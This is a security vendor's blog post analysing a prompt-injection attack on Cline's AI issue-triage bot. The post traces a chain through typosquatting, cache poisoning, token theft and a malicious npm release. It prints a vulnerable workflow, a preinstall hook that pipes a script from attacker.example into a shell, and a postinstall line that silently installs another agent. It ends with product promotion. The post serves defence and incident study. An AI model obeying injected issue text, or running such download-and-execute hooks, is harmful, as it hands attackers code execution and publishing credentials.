Security Incidents

How a Single GitHub Issue Title Compromised 4,000 Developer Machines

A prompt injection in a GitHub Issue title hijacked Cline's AI triage bot, stole npm tokens, and silently installed a rogue AI agent on 4,000 developer machines. The era of AI-installing-AI supply chain attacks has arrived.

Written by Ben Kim · 10 min read

Key Takeaways

  • A prompt injection embedded in a GitHub Issue title hijacked Cline's AI triage bot (Feb 2026)
  • Stolen npm token used to publish malicious cline@2.3.0, downloaded 4,000 times in 8 hours
  • Malicious package auto-installed OpenClaw (an AI agent) — full system access without developer consent
  • npm audit, code review, and provenance attestation all failed to detect the attack
  • Security researcher reported vulnerability in Dec 2025 → Cline unresponsive for 5 weeks → patched within 30 minutes of public disclosure
  • Credential rotation botched: the newly issued tokens were revoked while the leaked originals stayed valid for another day

What Happened: One Issue Title, 4,000 Compromised Machines

One day in February 2026, approximately 4,000 developers ran npm install as they always do. Maybe a VS Code notification told them Cline had been updated. Maybe they were setting up a new project and pulling in dependencies. Either way, nothing looked unusual in their terminals.

But at that moment, an AI agent called OpenClaw was being silently installed on their machines. It registered itself as a system daemon that survived reboots, read credentials from ~/.openclaw/, and could receive remote commands via a Gateway API.

None of these developers had installed this program. None had consented to it, evaluated it, or even heard of it.

It all started with a single GitHub Issue title.

Cline is a popular VS Code extension that uses AI to write and edit code. Its GitHub repository had accumulated tens of thousands of stars, and its weekly npm downloads consistently ranked among the top in its category. To manage the flood of incoming Issues, the Cline team built an AI triage workflow powered by Anthropic's claude-code-action. When a new Issue was filed, the AI would read its contents, automatically apply labels, and sort it by priority.

It was convenient. It was efficient. And it was catastrophic.

The problem was in the workflow's configuration. The GitHub Actions workflow pulled the Issue title via ${{ github.event.issue.title }} and passed it directly to the AI. No input validation. No sanitization. Worse, the configuration set allowed_non_write_users: "*", meaning every GitHub user on the planet could trigger this AI workflow simply by opening an Issue.
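The vulnerable pattern can be sketched in a few lines of workflow YAML. This is an illustration of the configuration described above, not Cline's actual workflow file; the action version and prompt wording are assumptions.

```yaml
# Illustrative only — not Cline's real workflow.
on:
  issues:
    types: [opened]

jobs:
  triage:
    runs-on: ubuntu-latest
    steps:
      - uses: anthropics/claude-code-action@v1   # version illustrative
        with:
          # Attacker-controlled text is interpolated straight into the prompt,
          # so instructions hidden in the title reach the model as-is.
          prompt: |
            Triage this issue and apply appropriate labels.
            Title: ${{ github.event.issue.title }}
          # Any GitHub account can trigger the workflow:
          allowed_non_write_users: "*"
```

Note that routing the title through an environment variable would stop expression injection into shell steps, but not prompt injection itself: as long as the model reads attacker text as part of its instructions, that surface remains.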

The attacker created Issue #8904. The title looked like a performance benchmark report, but embedded within it were instructions designed to manipulate the AI. Claude interpreted them as a legitimate work request and faithfully executed the attacker's commands.

This was the moment natural language became, for the first time, the entry point for a large-scale supply chain attack.

The 5-Step Attack Chain: From Natural Language to Mass Infection

5-Step Attack Chain Diagram

Clinejection — as the incident came to be known — captured the security community's attention not simply because "an AI tool was breached," but because five distinct vulnerabilities were chained together into a single, complete attack.

Step 1: Prompt Injection — Attack Commands Disguised as a "Performance Report"

The Issue title the attacker crafted appeared to be a routine performance report request. But hidden within it were instructions the AI triage bot could interpret. Claude recognized them as a separate command, abandoned its triage task, and began following the attacker's instructions.

This is prompt injection — the technique of embedding malicious instructions in user input to manipulate AI behavior. It has been one of the hottest topics in AI security. But before Clinejection, there were virtually no cases where prompt injection had led to real, large-scale damage. The fact that a theoretical risk became reality for the first time makes this attack particularly significant.

Step 2: Arbitrary Code Execution — The Precision of Typosquatting

Following the injected commands, the AI ran npm install targeting glthub-actions/cline. Notice anything? The 'i' in "github" has been swapped for an 'l'. The attacker had pre-created a fork with a name nearly identical to the original.

The typosquatted package's package.json contained a preinstall script. npm automatically runs this script before installing the package. The script downloaded and executed a shell script from a remote server. The AI was simply performing the "routine" action of installing a package, but that action gave the attacker a foothold for arbitrary code execution inside the CI/CD environment.
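The mechanism is a one-line lifecycle hook. The snippet below illustrates the technique with a hypothetical attacker domain; it is not the actual payload.

```json
{
  "name": "cline",
  "version": "0.0.1",
  "scripts": {
    "preinstall": "curl -fsSL https://attacker.example/setup.sh | sh"
  }
}
```

npm runs the preinstall script automatically as part of the install, with no prompt — which is what turned a routine install command into remote code execution.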

Step 3: Cache Poisoning — A Time-Delayed Attack Using 10GB of Junk

This is where the attack gets sophisticated. The remote shell script deployed Cacheract, a tool designed to attack GitHub Actions' caching system.

GitHub Actions caches dependencies like node_modules to speed up builds. Cache storage has limits, and when exceeded, the oldest entries are evicted using LRU (Least Recently Used). Cacheract exploited this mechanism in reverse. It flooded the cache with over 10GB of junk data, forcing out legitimate cache entries, then planted poisoned entries that matched the cache keys used by Cline's nightly release workflow.

This attack doesn't trigger immediately. It's a time-delayed attack that waits silently until Cline's nightly release runs. Because there's a gap between when the cache is poisoned and when the damage occurs, even real-time monitoring would struggle to connect cause and effect.
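The trust gap is easiest to see in a typical caching step. The fragment below is a generic sketch, not Cline's actual configuration: whatever cache entry matches the key is restored verbatim, and later steps execute whatever code was restored.

```yaml
# Generic sketch — not Cline's real workflow.
- uses: actions/cache@v4
  with:
    path: node_modules
    # The key is predictable: anyone who can write to the cache and knows
    # the lockfile hash can pre-plant a poisoned node_modules under it.
    key: node-modules-${{ runner.os }}-${{ hashFiles('package-lock.json') }}

# This step runs whatever landed in node_modules — including code
# restored from a poisoned cache entry.
- run: npm run build
```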

Step 4: Credential Theft — Three Keys to the Kingdom

The following night, Cline's nightly release workflow executed on schedule. It restored node_modules from cache — and the attacker's code was already embedded inside.

This workflow had access to three secrets needed for package deployment:

  • NPM_RELEASE_TOKEN — permission to publish packages to npm
  • VSCE_PAT — permission to publish extensions to VS Code Marketplace
  • OVSX_PAT — permission to publish extensions to OpenVSX

All three were exfiltrated to attacker infrastructure. The attacker now had complete authority to publish npm packages and VS Code extensions under Cline's name.

The critical issue here is that these were long-lived tokens. Once issued, they remain valid indefinitely until manually rotated. Had Cline used OIDC-based short-lived tokens, the workflow would have been issued temporary tokens valid only for that specific execution. Even if stolen, they couldn't be reused.
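As a sketch of the alternative: with npm's OIDC-based trusted publishing, the release job mints a short-lived identity token per run and publishes with provenance, so there is no long-lived secret to steal. The workflow below is illustrative and assumes the package has been configured for trusted publishing on the npm registry.

```yaml
# Illustrative release job using OIDC trusted publishing — no NPM_TOKEN secret.
jobs:
  release:
    runs-on: ubuntu-latest
    permissions:
      id-token: write   # lets the job mint a short-lived OIDC token
      contents: read
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-node@v4
        with:
          node-version: 22
          registry-url: "https://registry.npmjs.org"
      - run: npm ci
      # The registry verifies the workflow's OIDC identity and records
      # provenance; a token exfiltrated from cache is useless here.
      - run: npm publish --provenance --access public
```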

Step 5: Malicious Package Publication — The Power of One Line in package.json

Using the stolen npm token, the attacker published cline@2.3.0. The CLI binary was byte-identical to the previous version. The only change was a single line added to package.json:

"postinstall": "npm install -g openclaw@latest"

When npm install runs, postinstall scripts execute automatically. No confirmation is requested from the user. No special warning appears in the terminal. It simply runs as part of the dependency installation process.

This one line globally installed an AI agent called OpenClaw. The malicious package sat on the public npm registry for eight hours before security teams detected the anomaly and unpublished it — and in that window it was downloaded approximately 4,000 times. Eight hours, 4,000 compromised developer environments.

AI Installing AI — The New Grammar of Supply Chain Attacks

Confused Deputy Authority Delegation Diagram

Supply chain attacks are nothing new — SolarWinds, Codecov, ua-parser-js, event-stream. But Clinejection introduced a fundamentally different pattern.

In previous supply chain attacks, malicious payloads were cryptominers, backdoors, or data exfiltration scripts — exactly the kinds of code detection tools are designed to identify. But Clinejection's payload was legitimate software. OpenClaw is a properly registered npm package with no malware signatures. By itself, it is not malware; it was simply installed without consent.

This is the essence of the new threat Clinejection created: a recursive supply chain attack in which AI installs AI.

Security researchers have dubbed this "the supply chain's Confused Deputy Problem." The Confused Deputy Problem is a classic security issue arising from privilege delegation. A trusted program (the deputy) executes an attacker's request using its own privileges. In Clinejection, this problem manifested at the tool level.

A developer authorizes Cline to operate in their development environment. When Cline is compromised, that authority is delegated to OpenClaw. The developer never evaluated, never configured, and never consented to OpenClaw. Yet OpenClaw operates on the system using the privileges acquired through Cline.

Looking at what OpenClaw could do once installed reveals the severity of the problem. It could read credentials stored in ~/.openclaw/, receive and execute remote commands via a Gateway API, and register itself as a system daemon that persists across reboots. Endor Labs characterized the payload as "closer to proof-of-concept than weaponized," but the mechanism itself is immediately deployable in real-world attacks.

Comparing this with traditional supply chain attacks makes the evolution stark:

  • Entry point: malicious package or typosquatting → natural language
  • Execution agent: human or script → AI agent
  • Detectability: package scanners can flag the payload → the payload is a legitimate package, invisible to scanners
  • Payload: backdoor or cryptominer → another AI agent
  • Persistence: gone when the process is killed → survives reboots as a system daemon

The implication for security leaders is clear. AI tool permission chains cannot be managed with traditional access control models. In an environment where AI can invoke and install other AI, you need a new governance model that explicitly limits the scope of authority at each step. You need to be able to answer the question: "What other tools can this AI tool install?"

Why Every Security Tool Failed

The most uncomfortable truth of this incident is that every security tool organizations typically depend on failed entirely.

npm audit checks packages for known vulnerabilities and malicious signatures. But OpenClaw is a legitimate package. It contains no malicious code, has no registered CVEs, and violates none of npm's security rules. From npm audit's perspective, npm install -g openclaw@latest is a perfectly normal package installation command. The context of "installing legitimate software without consent" is not something npm audit can understand.

Code review examines changes to identify malicious modifications. But the CLI binary in cline@2.3.0 was byte-identical to the previous version. Review processes focused on binary diffs would detect no changes whatsoever. The only modification was one line in package.json — a postinstall script addition. A review process that meticulously checked package.json scripts might have caught it, but in most organizations, changes to the scripts section of package.json are treated as routine modifications.
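A review gate for exactly this gap is cheap to build. The sketch below is my own illustration, not any real tool's API: it diffs the scripts section between two package.json payloads and flags new install-time hooks for mandatory human review.

```python
import json

def scripts_diff(old_pkg: str, new_pkg: str) -> dict:
    """Return scripts entries that are new or changed in new_pkg."""
    old = json.loads(old_pkg).get("scripts", {})
    new = json.loads(new_pkg).get("scripts", {})
    return {k: v for k, v in new.items() if old.get(k) != v}

old = '{"name": "cline", "version": "2.2.9", "scripts": {"build": "tsc"}}'
new = ('{"name": "cline", "version": "2.3.0", "scripts": '
       '{"build": "tsc", "postinstall": "npm install -g openclaw@latest"}}')

diff = scripts_diff(old, new)
# Install-time lifecycle hooks deserve a mandatory human sign-off.
suspicious = {k: v for k, v in diff.items()
              if k in ("preinstall", "install", "postinstall")}
print(suspicious)   # the one line that compromised 4,000 machines
```

A check like this in the publish pipeline would have surfaced the cline@2.3.0 change even though the binary diff was empty.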

Provenance attestation verifies that packages were built in a trusted build environment. npm has supported OIDC-based provenance since 2023. Had this feature been enabled, publishing would have required cryptographic signatures from specific workflows, not just a token — blocking the attack entirely. But Cline hadn't adopted it. Anyone with a single long-lived token could publish packages under Cline's name.

Permission prompts ask users for consent before dangerous operations. But npm's postinstall scripts execute automatically during npm install. No prompt asks "This package wants to install a global package. Allow?" Dependency lifecycle scripts are effectively a zone where code execution without user consent is permitted.
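One blunt but effective countermeasure is to disable lifecycle scripts by default. A minimal .npmrc for a project or CI environment might look like this (note that some packages, such as those with native builds, legitimately need these hooks and will require allow-listed exceptions):

```ini
; .npmrc — preinstall/postinstall hooks no longer run automatically
ignore-scripts=true
```

The same effect per invocation is npm install --ignore-scripts. With this setting in place, the postinstall line in cline@2.3.0 would simply never have executed.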

Argus Secret Detection Dashboard

All four layers failed here. The most decisive single fix was OIDC-based provenance attestation, which would have severed the entire attack chain at Step 5: a stolen long-lived token cannot pass provenance verification.

Five Weeks of Silence and a Botched Token Rotation

The incident response failures in Clinejection are as shocking as the technical attack chain itself.

Security researcher Adnan Khan discovered this vulnerability chain in December 2025. Following responsible disclosure practices, he filed a GitHub Security Advisory on January 1, 2026. And he waited.

One week. Two weeks. A month. Five weeks with no response from Cline. Multiple follow-up attempts were met with silence.

Khan made the decision to go public on February 9, publishing the vulnerability details. Cline patched within 30 minutes — removing the AI triage workflows and beginning credential rotation.

But here is where the second failure occurred.

On February 10, the Cline team performed credential rotation. The standard procedure: invalidate leaked tokens and issue new ones. Except they deleted the wrong tokens. They revoked the newly issued tokens while leaving the leaked originals still valid. The error wasn't discovered until February 11, when they re-rotated — but by then, the damage was done.

And here's one more shocking detail. The person who actually published cline@2.3.0 wasn't Khan. Khan was merely the security researcher who discovered and reported the vulnerability. A separate, unknown attacker found Khan's proof-of-concept on his test repository and weaponized it directly against Cline.

What this timeline reveals is clear. Vulnerability response is not merely a matter of technical capability — it's a matter of process. Five weeks of silence doesn't mean the absence of sophisticated security architecture; it means the absence of basic security communication systems. Deleting the wrong token means there was no credential rotation verification procedure. A PoC being weaponized by a third party represents a failure in disclosure window management.

Cline subsequently announced the following remediation measures: removing GitHub Actions cache usage from credential-handling workflows, adopting OIDC provenance attestation for npm publishing, adding verification requirements for credential rotation, establishing vulnerability disclosure processes with SLAs, and commissioning third-party security audits of CI/CD infrastructure. All correct measures, but bittersweet given that they represent basic security hygiene that should have been in place from the start.

Redrawing the Defense Line for the AI Agent Era

Clinejection is not one organization's mistake. It demonstrates that every organization integrating AI tools into CI/CD pipelines faces the same structural risk. Issue triage, automated code review, automated testing, PR summarization — every workflow where AI processes external input and executes code is a potential attack surface.

There are three areas security leaders should examine immediately.

First, credential management in CI/CD pipelines. The linchpin of Clinejection was long-lived tokens. Switching to OIDC-based short-lived tokens is the single most effective defensive measure. npm already supports OIDC provenance, and GitHub Actions natively provides OIDC token issuance. If you have workflows that trust code restored from cache, either add cache integrity verification or eliminate cache usage entirely from credential-handling workflows.

Second, AI tool governance. You need to know what AI tools are being used across your development organization. VS Code extensions, GitHub Actions bots, AI agents in CI/CD pipelines — you need to understand what permissions each has and what external inputs they process. When AI tools can execute shell commands or install packages, their scope of authority must be explicitly restricted. Check whether settings like allowed_non_write_users: "*" exist in your own workflows.

Third, incident response processes. You need a system that can respond within 48 hours when an external security researcher reports a vulnerability. You need procedures to verify that previous tokens are actually invalidated after credential rotation. The two response failures Cline experienced — five weeks of silence and deleting the wrong token — didn't stem from a lack of sophisticated security technology. They stemmed from the absence of basic processes.

Preparing for the AI Agent Era with Cremit

The core of the Clinejection attack was credential theft and exfiltration. NPM_RELEASE_TOKEN, VSCE_PAT, OVSX_PAT — if these three long-lived tokens hadn't been leaked, 4,000 developer machines would have been safe.

Cremit Argus Dashboard

Cremit addresses the security challenge of the AI agent era at precisely this point.

Real-time Secret Detection. Cremit detects credential exposure across CI/CD pipelines, code repositories, logs, and configuration files in real time. When the Clinejection malware embedded in cache attempted to exfiltrate tokens to an external server, Cremit's detection would have caught the anomalous credential access pattern immediately. The moment a token is hardcoded in source, printed to logs, or transmitted over an unexpected network path, an alert fires.

NHI (Non-Human Identity) Management. Cremit provides complete visibility into non-human identities across your organization. API keys used by AI tools, service accounts in CI/CD pipelines, deployment tokens, OAuth secrets — see where each is used, how old it is, and whether it has excessive permissions, all at a glance. Had Cline known when NPM_RELEASE_TOKEN was last rotated and which workflows could access it, the window of exposure could have been dramatically reduced.

Automated Credential Lifecycle. Cremit automates the entire lifecycle of credentials — from issuance to rotation, expiration management, and unused credential cleanup. The manual rotation mistake Cline experienced — deleting the wrong token and leaving the leaked one valid — would not have occurred with automated lifecycle management.

AI coding tools are revolutionizing developer productivity. There's no reason to stop that momentum, and no way to. But new tools create new attack surfaces. Clinejection is just the beginning. Before the next attack targets your organization, start with the fundamentals of credential security.

Start securing credentials for the AI agent era with Cremit →

API Keys · Cloud Security · NHI Security · Supply Chain Attack
